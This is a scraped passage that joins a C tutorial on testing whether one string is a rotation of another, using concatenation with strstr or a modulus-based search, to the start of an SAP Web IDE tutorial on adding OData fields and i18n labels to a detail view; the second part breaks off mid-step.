*offset; if (strlen (str) != strlen (rot)) { return -1; } strcpy (concatenated, rot); strcat (concatenated, rot); offset = strstr (concatenated, str); if (offset == NULL) { return -1; } else { return (int)(offset - (char *)concatenated); } } int main (void) { char str[STR_MAX], rot[STR_MAX]; int rot_amt; printf ("Enter string: "); scanf (" %s", str); printf ("Enter rotated string: "); scanf (" %s", rot); rot_amt = check_if_rot (str, rot); if (rot_amt == -1) { printf ("The string \"%s\" is not a rotation \ of \"%s\"\n", str, rot); } else { printf ("The string \"%s\" IS a rotation of \"%s\". \ Amount of rotation is %d\n", str, rot, rot_amt); } return 0; } The function check_if_rot () checks if the string pointed by the second parameter is a rotation of the string pointed by the first parameter (or the other way). If true then returns the amount of rotation else returns -1. This method uses twice the space required for the string, extra. Second Method The concatenation of the rotated string to itself was done so that we can use the string search function to find the occurrence of the original string in the rotated string which wraps at the end. Instead of concatenating the rotated string to itself, we can modify the string search method so that it automatically wraps around the rotated string when matching. Consider the diagram again. Original String 0 1 2 3 4 +-----+-----+-----+-----+-----+ | h | e | l | l | o | +-----+-----+-----+-----+-----+ 3 characters rotated right 0 1 2 3 4 +-----+-----+-----+-----+-----+ | l | l | o | h | e | +-----+-----+-----+-----+-----+ Here we can do a naive string search algorithm by starting from each character and testing if the target string starts from that location. If we proceed in this way we will match the ‘h’ of the original string at location 3 of the rotated string. Now 1 in original will match 4 in rotated. Next we match 2 in original with 0 in rotated. This can be done if we match the ith location of original string with the ((k+i) mod n)th location of the rotated string, where k is a possible start point of the string in the rotated string. This is basically the same mechanism as the previous method. Here, the string starts at (len - k) to (2 * len - k - 1) mod n . Therefore the difference with the previous method is when the end of string is reached, instead of going into the concatenated portion and search linearly, we use the modulus operator to wrap around to the beginning of the string and continue the search. This method saves extra storage. The function is as below. int check_if_rot1 (char *str, char *rot) { int n = strlen (str), pos, i, flag; if (n != strlen (rot)) { return -1; } for (pos=0; pos<n; pos++) { for (i=0, flag=0; i<n; i++) { if (rot[(pos+i)%n] != str[i]) { flag = 1; break; } } if (flag == 0) { return pos; } } return -1; } pos is the position from where in the rotated string we try to find a match with the original string. If the match location (pos + i) is beyond the end of the rot string then the process should continue the match from the starting of the string rot, which is done by the (pos + i) % n. This process does not use any extra space.
https://phoxis.org/2013/05/24/check-if-a-string-is-rotation-of-another/
CC-MAIN-2022-05
refinedweb
1,028
66.27
Percona Server crashes with segmentation fault when disk quota is reached Bug Description Percona Server crashes with segmentation fault when mysqld tries to write data to a table that would mean extending the tablespace file, and disk quota is reached outside the database directory, but on the same volume. === OS: DISTRIB_ID=Ubuntu DISTRIB_ DISTRIB_ DISTRIB_ 2.6.32-341-ec2 #42-Ubuntu SMP Tue Dec 6 14:56:13 UTC 2011 x86_64 GNU/Linux === Percona Server version Server version: 5.5.24-55-log Percona Server (GPL), Release 26.0 -- Filesystem and mount options /dev/sdm /vol/ebs1 xfs rw,nodiratime, === Test case -- create a new group and set quota of 10M for testing purposes groupadd free2 xfs_quota -x -c 'limit -g bsoft=10m bhard=10m free2' /vol/ebs1 -- create database and change the group to free2 and setgid for the database directory so that all files created in the directory are owned by the user free2 mysql [(none)]> create database free2test; chgrp -R free2 /vol/ebs1/ chmod +s /vol/ebs1/ -- create the table as follows in the database free2test mysql [(none)]> use free2test; Database changed mysql [free2test]> CREATE TABLE `t1` ( `i` int(11) not null auto_increment primary key, c char(255) default 'dummy_text' ) ENGINE=InnoDB DEFAULT CHARSET=utf8; Query OK, 0 rows affected (0.03 sec) -- now create a 9M file outside of the database directory but in /vol/ebs1 where the quota is applied and change its group to free2 (the one on which quota is set) dd if=/dev/zero of=/vol/ chgrp free2 /vol/ebs1/ -- now insert values into the table till MySQL crashes insert into t1(i) values (null); insert into t1 select null, c from t1; <-- 11th time this is executed and MySQL crashes The gdb backtrace of the crash is attached. The section to look at is "Thread 1 (Thread 10457)", the segmentation fault is caused inside the function btr_page_) I believe it applies to upstream as well. In which case, it should also have an upstream bug report linked. I am able to repeat the crash with the test case provided above on both Percona Server 5.5.24 and 5.5.28-29.1 on CentOS 5.8 The crash is also repeatable on upstream 5.5.28 and the stack trace is exactly the same. Attached you will find the complete backtrace generated from the core file. Based on the trace, the call stack is probably like: (in reverse order) fsp_try_ fsp_reserve_ fseg_alloc_ btr_page_alloc_low btr_page_alloc btr_page_ (with no NULL checking in btr_page_alloc and btr_page_ if (new_block) { buf_block_ } ) fsp_try_ Non-innodb code -- my_write in my_write.c handles this with a loop till space is available (with special handling for EDQUOT) whereas os_file_write_func doesn't do that and fails if ENOSPC/EDQUOT. Ovais - Thanks. Could you also check 5.1 (since we will start fixing it there), and if debug builds crash differently? Error log of MySQl 5.5.28 crash Laurynas, I am not able to repeat the crash on MySQL 5.1.66. The exact steps when done on 5.1.66 are handled gracefully and when there is no space available the following reported: mysql> insert into t1 select null, c from t1; ERROR 1114 (HY000): The table 't1' is full mysql> insert into t1 select null, c from t1; ERROR 1114 (HY000): The table 't1' is full The error log entries are also different: Version: '5.1.66-community' socket: '/mnt/mysql/ 121117 3:06:58 InnoDB: Error: Write to file ./free2test/t1.ibd failed at offset 0 131072. InnoDB: 16384 bytes should have been written, only -1'. InnoDB: Some operating system error numbers are described at InnoDB: http:// 121117 3:06:58 [ERROR] /usr/sbin/mysqld: The table 't1' is full 121117 3:07:13 [ERROR] /usr/sbin/mysqld: The table 't1' is full Note that MySQL 5.5.28 reports "Operating system error number 0" while 5.1.66 reports "Operating system error number 122" which is more correct. Ovais - Thanks. Can you test the 5.5 debug build too? Laurynas, I am able to reproduce the crash on upstream 5.5.28 debug-build. The debug-build crashes with an assertion failure instead of segmentation fault. Attached is the gdb backtrace of the crashed 5.5.28 debug-build Attached is the error log of the crashed upstream 5.5.28 debug-build I tried this against 5.5.-28.29.1 on CentOS 6, using xfs and the sequence described above but with no crash. I properly got on the 15th insert: mysql> insert into t1 select null, c from t1; ERROR 1114 (HY000): The table 't1' is full Perhaps there is some minor difference in xfs between Ubuntu, CentOS 5 and Centos 6? I will try with upstream 5.5.28... OK, must be some difference in xfs, MySQL 5.5.28 behaves correctly as well (unless I am missing something in the reproduction). I will try to create a VM with Ubuntu and see if I can reproduce there... 1) The assertion failure in #12 and #13 is the effect and not the cause of the crash. btr0btr.c: new_block = btr_page_ new_page = buf_block_ btr_page_alloc returns NULL and buf_block_get_frame fails on that assertion. It falls for this assertion ut_ad(block); Interestingly, PS has non-debug assertions in place there: ut_a(srv_ if (srv_pass_ return(0); } ut_ad(block); Now, the reason why that assertion is not getting triggered in MySQL/PS release builds (and instead crashing with signal 11) is because: ======= #ifdef UNIV_DEBUG /****** Gets a pointer to the memory frame of a block. @return pointer to the frame */ UNIV_INLINE buf_frame_t* buf_block_ /*===== const buf_block_t* block) /*!< in: pointer to the control block */ __attribute_ #else /* UNIV_DEBUG */ # define buf_block_ #endif /* UNIV_DEBUG */ ======= ie. in non UNIV_DEBUG builds, it is a macro, hence the backtrace just shows only upto btr_page_ 2) Regarding 'The table ... is full', fsp_reserve_ @Ovais, can you provide the cnf file you used for the MySQL/PS instances mentioned above? (also was it a shared tablespace (spaceid=0) or single tablespace) Here is the my.cnf file I used in the tests: [client] socket = /tmp/mysql.sock [mysqld] datadir = /mnt/mysql-55 user = mysql socket = /tmp/mysql.sock innodb_ core-file [mysqld_safe] core-file-size = unlimited George, Did you test with innodb_ Ovais, oddly enough, no I did not use file_per_table which is quite odd as I almost always use it. Anyway, I retested on CentOS 6 with PS 5.5.28-29.1 debug builds (both with and without WITH_DEBUG=ON) and file_per table, also tried a few different things on what files are contained in the free2 group and get either: "ERROR 1114 (HY000): The table 't1' is full" from mysql if I "chgrp -R free2 /5gb/mysql/ 121120 9:26:02 [ERROR] /usr/local/ 121120 9:26:02 [ERROR] /usr/local/ from mysqld if I follow the test procedure exactly. I failed miserably at getting CentOS 5 VM running and building yesterday, wow, Stewart was correct, it really does, uhh, stink...so I will try Ubuntu 10.4 lucid to try and save some time rather than fighting anymore with CentOS 5 and see if I can reproduce. My specifics: mount: /dev/sdb on /5gb type xfs (rw,nodiratime, my.cnf: [client] port = 3306 socket = /tmp/mysql.sock [mysqld] port = 3306 socket = /tmp/mysql.sock skip-external- key_buffer_size = 256M max_allowed_packet = 1M table_open_cache = 256 sort_buffer_size = 1M read_buffer_size = 1M read_rnd_ myisam_ thread_cache_size = 8 query_cache_size= 16M thread_concurrency = 8 log-bin=mysql-bin binlog_format=mixed server-id = 1 innodb_ innodb_ innodb_ innodb_ innodb_ innodb_ innodb_ innodb_ innodb_ innodb_ core-file [root@localhost glorch]# ls -l /5gb/mysql/ total 149616 drwx------. 2 mysql free2 45 Nov 20 09:25 free2test -rw-rw----. 1 mysql free2 18874368 Nov 20 09:35 ibdata1 -rw-rw----. 1 mysql free2 67108864 Nov 20 09:35 ib_logfile0 -rw-rw----. 1 mysql free2 67108864 Nov 20 09:23 ib_logfile1 -rw-rw----. 1 mysql free2 5 Nov 20 09:23 localhost.pid drwx------. 2 mysql free2 4096 Nov 20 09:23 mysql -rw-rw----. 1 mysql free2 27338 Nov 20 09:23 mysql-bin.000001 -rw-rw----. 1 mysql free2 126 Nov 20 09:23 mysql-bin.000002 -rw-rw----. 1 mysql free2 65536 Nov 20 09:35 mysql-bin.000003 -rw-rw----. 1 mysql free2 57 Nov 20 09:23 mysql-bin.index drwx------. 2 mysql free2 4096 Nov 20 09:23 performance_schema drwx------. 2 mysql free2 6 Nov 20 09:23 test [root@localhost glorch]# ls -l /5gb/mysql/ total 9232 -rw-rw----. 1 mysql free2 65 Nov 20 09:24 db.opt -rw-rw----. 1 mysql mysql 8578 Nov 20 09:25 t1.frm -rw-rw----. 1 mysql mysql 9437184 Nov 20 09:35 t1.ibd George, I only get the crash when I create a file out of MySQL but within the same group on which the quota is applied. Perhaps you didn't actually run the steps in the sequence that I mentioned? And I see that you also have binlogging enabled, so one of the messages that you see "Waiting for someone to free space" is binlogging related. I will try to run my test case on a CentOS 6 VM and let you know. OK, I got it Ovais, was just replying when I got your response here. My directory structure was slightly different than yours. I got it under Ubuntu 10.04.4 lucid using your my.cnf and a closer approximation of your directory structure. On initial inspection, Raghavendras analysis of the issue above is spot on. I will switch back to CentOS 6 (my preferred environment) and retry there, then continue on with the fix. Thanks for all the info. Annnd, I got it in CentOS 6 now too. Thanks a bunch guys...possible fix forthcoming. Now, that we have verified it, we need to see what should the behaviour be in this case -- whether to return DB_OUT_ Also, error handling is required in btr_cur_ ...... } else { *rec = btr_page_ } ...... (big_rec needs to be set NULL as well as DB_OUT_ Raghu, Related to what you are saying that InnoDB should spin and wait for space to be available, there is something similar in upstream 5.7.0 where MySQL retries the operation several times before giving up, see this bug report: http:// OK, so this is rather nasty, in PS 5.5.28: btr0cur. fsp0fsp. So then btr0cur. It then calls: btr0btr. OK, so, lets fix the math error in fsp_reserve_ n_free_up = (size - free_limit) / FSP_EXTENT_SIZE; to: if (size <= free_limit) { n_free_up = 0; } else if (alloc_type == FSP_UNDO) { n_free_up = (size - free_limit) / FSP_EXTENT_SIZE; } OK, so this solves the issue for _small_ inserts, like if the test above just did something like: for i in `seq 2000`; do mysql -e 'INSERT INTO free2test.t1(i) VALUES (null)'; done; But, if we follow the sequence prescribed above by doing: mysql -e 'INSERT INTO free2test.t1 SELECT null FROM free2test.t1' Then we have a big problem. There is no space left to perform the rollback. If we set a simple break point at the end of fsp_reserve_ b fsp0fsp.c:3088 if space > 0 && (!success || !n_pages_added) This will stop us every time we 'detect' the error... Here is the call stack where we first detect the space issue: #0 fsp_reserve_ #1 0x0000000000879ecc in btr_cur_ at /home/glorch/ #2 0x0000000000960e12 in row_ins_ #3 0x0000000000962681 in row_ins_index_entry (index= #4 0x00000000009631c5 in row_ins_index_e... George, I repeated the test case with innodb_ 121127 5:38:57 InnoDB: Error: Write to file ./ibdata1 failed at offset 0 20971520. InnoDB: 1048576 bytes should have been written, only 196608 were written. InnoDB: Operating system error number 0. InnoDB: Check that your OS and file system support files of this size. InnoDB: Check also that the disk is not full or a disk quota exceeded. InnoDB: Error number 0 means 'Success'. InnoDB: Some operating system error numbers are described at InnoDB: http:// You can see that the error log entry makes reference to partial write and that the error number was 0, which is exactly what is written to the error log when InnoDB crashed. However, repeatedly executing the insert ... select only results in the following message: 121127 5:38:57 [ERROR] /usr/sbin/mysqld: The table 't1' is full 121127 5:39:04 [ERROR] /usr/sbin/mysqld: The table 't1' is full 121127 5:39:06 [ERROR] /usr/sbin/mysqld: The table 't1' is full Could this be taken as a workaround "using single shared tablespace with innodb_ Ovais, innodb_ I can make the server crash or fail gracefully by simply varying the number of rows inserted at one time which varies the both the required space to perform the inserts _and_ the space required to perform a rollback. By inserting a single row at a time, there is almost always going to be enough space left to perform a rollback when enough extents can't be reserved for the insert. By increasing the number of rows inserted at once until the balance of space reaches a point where the row size requirement is just less than the available free space is where the rollback crash will occur since then the attempt to reserve any extents to perform the rollback will fail, sending the server into a massive anxiety attack and shutting down. So changing where the space is allocated is really just pushing peas around the plate. See http:// The money quote: "[17 Mar 2009 9:39] Marko Mäkelä Fixing this bug would be a major undertaking, and it might affect the performance of InnoDB as well. InnoDB assumes in many places that space is available for the undo log records. We could add a check (and a rollback) to each place where something is written to the undo log, but that would likely move the problem elsewhere, since B-tree delete operations sometimes require extra space. We could also shut down InnoDB in the event of such a failure, but that would require extra checking (possibly even locking) in the MySQL-to-InnoDB interface. The bottom line is that the root cause (the InnoDB system tablespace being too small) cannot be fixed without a server restart. Currently, InnoDB can't be shut down and restarted independently of MySQL. The fix is too risky to be implemented in the stable releases of MySQL." George, Based on Marko's comments in this bug report http:// If there really would be any performance regression, I think many users would be more concerned by that rather than the fixes in tablespace management :) I don't think "Fix Released" is a correct status for this bug. The server still crashes on full disk errors. What has been fixed is bug 1083700 (bug in reserved extent number calculation), and this one should be "Won't Fix" instead. Percona now uses JIRA for bug reports so this bug report is migrated to: https:/ Is this reproducible with - - Current 5.5 release? - Current 5.1 release? - Is this bug Percona Server-specific or is it reproducible with MySQL too? Also would be useful to try reproducing this using a debug build.
https://bugs.launchpad.net/percona-server/+bug/1079596
CC-MAIN-2021-10
refinedweb
2,514
70.73
following lines appear in this sample: string myAccountKey = "myliveID@hotmail.com"; string myUniqueUserId = "your key here"; .... azureWebRequest.Credentials = new NetworkCredential(myAccountKey, myUniqueUserId); Obviously, the two variable names are reversed. The code works only because the author made the same reversal in the last line that he made in the first two lines. But that doesn't change the fact that this code is very misleading. The FIRST parameter to the NetworkCredential ctor must be a user name and the SECOND must be the DataMarket account key. Note from the Author or Editor:This is correct. Make sure the first variable is the user name and the second is the key. The following phrase should be deleted from step 7: "After the project has been created" That phrase makes no sense here. The project is not only created, we've already added a service reference to it in an earlier step. Note from the Author or Editor:Typo: "project" was meant to be "service reference" here. This code was apparently copied from p 36, but the namespace and class names are not correct here on p 43. The namespace is DallasCrimeDataWebPart and the class is ReturnCrimeData. Note from the Author or Editor:If you walk through the steps, then you will have a namespace of DallasCrimeDataWebPart (assuming you don't add your class as a separate resource in a separate namespace) and the class will read ReturnCrimeData. The important elements are the class members/properties are the same. Both of the these pages have the line: using Dallas_Silverlight_Crime_App.DallasCrimeDataSvc; But in fact in step 6 on p. 42, we were instructed to use the name DallasCrimeDataService. So the two using statements should be: using Dallas_Silverlight_Crime_App.DallasCrimeDataService; This procedure has us add the service reference twice. Once in steps 5-7 and then again, with a different name, in steps 9-11. This is redundant. Steps 9-11 should be deleted. Note from the Author or Editor:This is indeed a duplicate step. You only need to add the local service reference once. With SDK 1.4, a reference to Microsoft.WindowsAzure.StorageClient.DLL is already part of the project when it is created so it cannot be added here. You also have to add a using statement for Microsoft.WindowsAzure.ServiceRuntime The following line in the RowCommandHandler definition is unneeded: var blobContainer = azureBlobClient.GetContainerReference("imagefiles"); There is already a global blob container reference that was initialized in the Page_Load method. Delete the line above and change the variable name in the line that follows it to azureBlobContainer like this: var blog = azureBlobContainer.GetBlobReference(blobName.ToString()); "... the GetCurrentDateTime method (a helper method that returns the current date and time as a DateTime object) ... " Actually, it returns the current date and time as a STRING object. In fact, converting the DateTime to a string is the only purpose it serves. "videofiles" near the end of the line should be "imagefiles" "WCF Web Application" should be "WCF Service Application" "the WCF solution" should be "the WCF project within your solution". You do NOT want to right-click the whole solution. There is a missing step between steps 4 and 5. You have to open the *.svc file in Visual Studio and change the "Service1" to "GetAzrueDataStorage". Otherwise, IIS throws an exception that it can't find a type named "Service1". This step is way too rushed and leaves out much. I recommend replacing it with the following: 9.a. After the IIS web site is created, double-click Application Pools in the IIS Manager navigation tree to open the list of application pools. 9.b. Look at the entry for the pool that has the same name as the IIS web site you just created. The .NET Framework column should say "v4.0" for this row. If it does not, right-click the row and select Basic Settings. In the dialog that opens, change the .NET Frameowrk to 4.0 and click OK. 9.c. Highlight the new IIS web site in the Sites node of IIS manager and click the Content View tab near the bottom of the screen. 9.d. Right-click the *.svc file and select Browse. If all is well, your browser will open to a page telling you that you need to create a client. You will NOT get the actual data from the service at this time. Note from the Author or Editor:While we're only testing if the service resolves and loads, this is fine detail to add. Before you close the Add Web Site dialog, you need to click Test Settings to verify that your service user is both authenticated and authorized to read the folder to which you published the service. ON A TYPICAL SHAREPOINT DEVELOPMENT MACHINE, IT WILL NOT BE AUTHROIZED. If it is not, either give the user the needed sharing permissions to the folder or use the Connect As button on the Add Web Site dialog to change the service user to one who already has the needed permissions. Note from the Author or Editor:Yes, this is correct. Also, note that much of this book was written in an admin context on a single server farm and should be treated as demo code. This book warrants an entirely separate FAQ on best practices for production deployments. Some text that is not bolded also needs to be added; for example, the "sdk" namespace declaration and the DesignerWidth. You really should replace all of the contents of MainPage.xaml with the whole of the code sample in this step. replace "to the file" with "to the project" There's a step missing here. Between steps 13 and 14, you need to add a reference in the project to the System.Xml.Linq assembly. ANOTHER MISSING STEP BETWEEN STEPS 13 AND 14! You have to right-click the References node in the project and add a Service Reference. Click Discover in the dialog and it will find the service you created earlier in the exercise. Click Go. Then replace the default namespace name with "AzureImageWCFService". Click OK. A THIRD MISSING STEP between steps 13 and 14. You have to right-click the References node in the Silverlight project and add a reference to the System.Windows.Controls.Data assembly. If you don't some generated code that references the DataGrid control will produce a compile time error. Note from the Author or Editor:On page 138, in step 12 the instructions discuss adding code that provides a datagrid on the app. You can also drag and drop a Datagrid control to the Silverlight canvas, which will automatically add the correct assembly references to the project. There's a missing step here after step 14. You need to add the two cross domain policy XML files from the top of p. 51 to the folder where you published the WCF service. E.g., C:\AzureBlobService the line using Microsoft.SharePoint.Client; should be: using ClientOM = Microsoft.SharePoint.Client; Note from the Author or Editor:On page 147, the code that leverages the clientside object model is prefaced with the "ClientOM" namespace. As per the errata suggestion, you can amend the using statement to "using ClientOM = Microsoft.SharePoint.Client" else leave "using Microsoft.SharePoint.Client" and remove the "ClientOM" namespace prefix in the code. An additional required step is left out. You need to edit the Web Part to change its Height to 600px and its width to 1000px. Note from the Author or Editor:On page 150, after step 16, you can edit the web part and in the Appearances section of the Web Part Options you can select a Height and Width for the web part. As per the note, you can select 600px for height and 1000px for width--or whatever height and width are amenable to your needs. There is a whole set of missing steps here connected with creating a list. You have to create a list named "Azure Images" and give it a Link column (SharePoint column type hyperlink), a Coolness column (type Choice), and a Notes column (type multiple lines of test). To get your list to match the screen shot on p. 151, you also have to rename the Title column to "Name". Note from the Author or Editor:On page 150, step 9 assumes you've created a list called Azure Images. It should read: 9. Open your SharePoint site, and if you haven't already create a new list called "Azure Images" and add three columns. Call the first column you add (of type Hyperlink) "Link." Call the second column you add (of type Choice) Coolness. Call the third column you add (of type Multiple lines of text) Notes. Then rename the Title column to "Name." The downloaded source files for chapter 6 are missing the WCF service folder and its files. The *.sln file is looking for WCFServiceWebRole1\AzureMortgageService.csproj and there isn't such a folder or file. Note from the Author or Editor:I've added the missing service code here:. It is contained in the "Missing_Service_Code.zip" zipped archive. "AzureService.cs" should be "AzureService.svc.cs" Note from the Author or Editor:When you create a new service, the default name is typically "Service1.svc" for example. When you double-click to view the service class code, you should see "Service1.svc.cs" as the class code. So, this errata is correct; there was an editing error that was not caught. If you follow the steps, in your project you should have "AzureService.svc.cs" as the core service class code. © 2014, O’Reilly Media, Inc. (707) 827-7019 (800) 889-8969 All trademarks and registered trademarks appearing on oreilly.com are the property of their respective owners.
http://www.oreilly.com/catalog/errata.csp?isbn=0790145316462
CC-MAIN-2014-41
refinedweb
1,627
66.64
So, you have an application that uses a lot of threads and you would like to know how to trigger a dump when the number of threads exceeds a particular limit. Well, look no further, this is how you can do it. Let’s do it by example. Start Visual Studio and create a new web site. Add a button to the default.aspx page and set the code behind for the page to this: using System.Threading; public partial class _Default : System.Web.UI.Page { protected void Page_Load(object sender, EventArgs e){} protected void Button1_Click(object sender, EventArgs e) { List<Person> persons = new List<Person>(); int noOfPersons = 25; int sleepTime = 20000; for (int i = 0; i < noOfPersons; i++) { persons.Add(new Person()); } foreach (Person p in persons) p.StartUpdate(sleepTime); } class Person public Thread UpdateThread; public Person() UpdateThread = new Thread(Person.FakeUpdateToRemoteResource); public void StartUpdate(int sleepTime) UpdateThread.Start(sleepTime); public static void FakeUpdateToRemoteResource(object sleepTime) Thread.Sleep(Convert.ToInt32(sleepTime)); } This is naturally not how you should code anything. This is just to emulate an application that will update list of persons. Each update on a separate thread since the working with the remote resource may be slow. So, build the above and navigate to the Default.aspx page. Start Performance Monitor and add the counter ‘Thread Count’ for the w3wp process under the Process section. Then hit the button and you should see something like below, 25 threads running for 20 seconds. So now we know that we see the behavior. So, how to dump on this. It can be done from DebugDiag (it will use the same mechanics as below), but if you do not want to install anything then you can do it like this: . Create a directory called C:\ProcDump. . Download ProcDump from here: . Unzip the ProdDump.zip in the C:\ProcDump directory. . Start a Command Prompt as Administrator ("Run as administrator") and navigate to the C:\ProcDump\ directory. . Find out what the PID is for the w3wp.exe process that we want to dump, for example with Task Manager and the PID column. . Run the following from the commandprompt. !!! Replace both occurrences of 1234 to be the PID for your w3wp.exe !!! procdump -accepteula -p "\Process(w3wp_1234)\Thread Count" 50 -s 10 -ma 1234 . This will generate a full (-ma) dump when the # of threads for PID 1234 is > than 50 for more than 10 seconds. -> You can change 50 in order to dump on a higher or lower number of threads. -> You can change 10 (-s switch) in order to dump on a higher or lower threshold that must be hit before dump is written. -> The dump will end up in the C:\ProcDump\ directory. Once ProcDump is running, hit the button again and you should get an output like below and the dump file created in the C:\ProcDump directory. Hope this helps.
http://blogs.msdn.com/b/spike/archive/2012/02/27/how-to-create-a-dump-on-x-number-of-threads-in-a-process.aspx?Redirected=true
CC-MAIN-2015-18
refinedweb
482
67.65
ctflags - Perl extension for compile time flags configuration use ctflags qw(foo=myapp:f76 debug=myapp:debug:aShu); if (foo > 45) { ... } debug and warn "hey!, debugging..."; use ctflags package=>'foo', prefix=>'bar', 'myapp:danKE', 'mycnt=yours:Y6'; print "foo::bar_d=".foo::bar_d."\n"; print "foo::bar_K=".foo::bar_K."\n"; print "foo::mycnt=".foo::mycnt."\n"; ctflags module (and ctflags::parse) allow to easily define flags as perl constant whose values are specified from comand line options or environment variables. ctflags and ctflags::parse packages allow to dynamically set constants values at compile time (every time the perl script is run) based on environment variables or command line options. Conceptually, ctflags are unsigned integer variables named with a single letter ('a'..'z', 'A'..'Z', case matters), and structured in namespaces. Several ctflags with the same name can coexist as long as they live in different namespaces (as perl variables with the same name but living in different packages are different variables). Namespace names have to be valid perl identifiers composed of letters, the underscore char ( _) and numbers. The colon ( :) can also be used to simulate nested namespaces. Examples of valid qualified ctflags names are... myapp:a # ctflag a in namespace myapp myapp:A # ctflag A in namespace myapp myapp:debug:c # ctflag c in namespace myapp:debug otherapp:C # ctflag C in namespace otherapp App3:A # ctflag A in namespace App3 A property of ctflags is that they do not need to be predefined to be used and their default value is 0. Package ctflags offers a set of utilities to convert ctflags to constants. Basic functionality to set and retrieve ctflag values is also offered but the ctflags::parse package should be preferred for this task. sets value of ctflag $name in namespace $ns to be $value. This function will be useless unless you are able to call it before ctflags are converted to constants, and this means early at compile time, and this means that you will have to use BEGIN {...} blocks. i.e.: # at the beginning of your script; use ctflags; BEGIN { use Getopt::Std; our ($opt_v) getopts ("v:") ctflags::set('myapp', 'v', $opt_v); } use Any::Module ... # in Any::Module package Any::Module; use ctflags 'verbose=myapp:v'; retrieves value of ctflag $name in namespace $ns. creates perl constants from ctflag values. @options can be a combination of key => value option pairs and ctflags-to-constants-conversion-specifications. Currently supported options are: When no name is explicitly set for the constant to be created, one is automatically generated as $prefix.$ctflag_name. Default prefix is ctflag_ and this option lets to change it. i.e.: use ctflags prefix=>'debug_', 'myapp:debug:abc'; exports ctflags a, b and c in namespace myapp:debug as constants debug_a, debug_b and debug_c. exports the constants to package $package instead of to the current one. i.e.: use ctflags package=>'foo', 'flag=myapp:f', package=>'bar', 'flag=myapp:b'; exports ctflag f in namespace myapp as perl constant foo::flag and ctflag b in namespace myapp as perl constant bar::flag. ctflags to constants conversions are specified as: [cnt_name=]namespace:(*|ctflag_names) this expand to a small set of rules: export all ctflags in namespace foo as constants ctflag_a, ctflag_b,..., ctflag_Z. (unless prefix option has been used to change generated constant names to say myprefix_a, myprefix_b, etc.) export ctflags b, a, r in namespace foo as ctflag_b, ctflag_a, ctflag_r. export ctflag b in namespace foo as constant cnt when the constant name appears explicitly and more than one ctflag are specified in any way, the value of the constant is the result of combining all the ctflags values with the arithmetic or operator ( |). i.e: use ctflags qw(anydebug=myapp:debug:*); ... if (anydebug) { open DEBUG, ">/tmp/output" } Default values can be specified to be used when no value has been previosly assigned explicitly to a ctflag. They should be composed of digits and appear in the conversion specification just after the ctflag name letter to be affected. i.e.: use ctflags qw(foo:bar67) ctflag_r will return 67 unless foo:r had been previouly defined in any way. The specification of the default value do not assign it to the ctflag. i.e: use ctflags qw(cnt1=foo:r67) use ctflags qw(cnt2=foo:r) if ctflag foo:r was not previusly set, cnt1 will return 67 and cnt2 will return 0. Uff... well, it depends, see the import function in the previous section. This is version 0.01, and I am sure that several bugs are going to appear. Also I reserve the rigth to change the public interface of the module in an incompatible manner if deficiencies in the current one are found (this will not be this way forever, just for some time). I will really apreciate any correction to the documentation prose, English is not my native tongue and so... Companion package ctflags::parse, constant package and perlsub for a discusion about how perl constants can be implemented as inlined subrutines. Salvador Fandiño Garcia, <sfandino@yahoo.com> (please, revert to "Salvador Fandino Garcia" if your display charset is not latin-1 compatible :-( This library is free software; you can redistribute it and/or modify it under the same terms as Perl itself.
http://search.cpan.org/~salva/ctflags-0.04/ctflags.pm
CC-MAIN-2015-14
refinedweb
872
53.81
Refresh Schema doesn't work Discussion in 'ASP .Net' started by Steve Elliott, Apr32 - Markus - Nov 23, 2005 [XML Schema] Including a schema document with absent target namespace to a schema with specified tarStanimir Stamenkov, Apr 22, 2005, in forum: XML - Replies: - 3 - Views: - 1,309 - Stanimir Stamenkov - Apr 25, 2005 GridView doesn't refresh schema after changes were made in bounded stored procedureOrit, Jun 26, 2007, in forum: ASP .Net - Replies: - 1 - Views: - 482 - Masudur - Jun 26, 2007 css background doesn`t change - hover doesn`t workMZ, Mar 16, 2008, in forum: HTML - Replies: - 7 - Views: - 858 - Ed Mullen - Mar 17, 2008 <location> doesn't work when parent directory of path doesn't exiTilman, Mar 19, 2008, in forum: ASP .Net Security - Replies: - 0 - Views: - 435 - Tilman - Mar 19, 2008
http://www.thecodingforums.com/threads/refresh-schema-doesnt-work.497043/
CC-MAIN-2014-49
refinedweb
131
56.93
On 12/01/2009 12:46 PM, Kornel Lesiński wrote: AdvertisingPHPTAL has been accepted as official PEAR package! Good work! The good things: * It's been reviewed by PEAR team and they'll be keeping eye on package's quality. * It's got access to pear.php.net facilities, like bug tracker, roadmaps, releases archive, official installer, etc. I haven't prepared PEAR releases yet, but you can start using bug tracker now: * It will be hosted in php.net SVN repository. The bad news is that PEAR requires renaming of package from just "PHPTAL" to "HTML_Template_PHPTAL", which means change of all class names! Since I'm not too keen on having 3 times longer class name prefix, I've decided to use PHP 5.3 namespaces (PEAR2 package) for official PEAR releases. In PHP5.3 you can hide those long prefixes by aliasing namespaces. might then be of interest :) regards, Tarjei Of course I realize 5.3 isn't available to everyone yet, so I'm going to keep current backwards-compatible distribution maintained in parallel until PHP 5.3 becomes commonplace. Questions? Suggestions? -- Tarjei Huse Mobil: 920 63 413 _______________________________________________ PHPTAL mailing list PHPTAL@lists.motion-twin.com
https://www.mail-archive.com/phptal@lists.motion-twin.com/msg01177.html
CC-MAIN-2018-26
refinedweb
200
58.69
You will learn With your app committed to your Git repository, you can now safely make some changes to the app. By Jim Jaquet Create an XML view fragment file to control the display of information on the tab in your app With your app committed to your Git repository, you can now safely make some changes to the app. Any mistakes you make can be removed by discarding your changes using the Git pane. In this tutorial, you will add some additional data fields to the detail view (the right side of you app), change the icons used on the tabs, and finally add an XML fragment file to contain the display of information on one of the tabs in the app. Open the SAP Web IDE, and navigate in the te2016 > webapp > view folder. Double-click on Detail.view.xml to open it in the editor. Insert the code below into the ObjectHeader element. This XML snippet below adds four fields from the OData service (City, Country, URL and Partner role), as well as a reference to a title that you will insert in the next step. Note that the code generated by the template has a closing angle bracket on line 19. That angle bracket belongs with the line above. Insert the code below as shown and you can clean up the angle bracket as well. Save your changes. Code to insert: <ObjectAttribute title="{i18n>headerCity}" text="{Address/City}"/> <ObjectAttribute title="{i18n>headerCountry}" text="{Address/CountryText}"/> <ObjectAttribute title="{i18n>headerURL}" text="{WebAddress}"/> <ObjectAttribute title="{i18n>headerBusinessPartnerRole}" text="{BusinessPartnerRoleText}"/> Your XML file should look like this: The title attributes in the snippet you inserted tell the app to look for the label of the data field in a centralized file. To add those labels, open the te2016 > webapp > i18n folder and double-click the i18n.properties file. Insert the text below at the end of the i18n.properties file just below the Detail View separator line and save your edits. headerCity=City 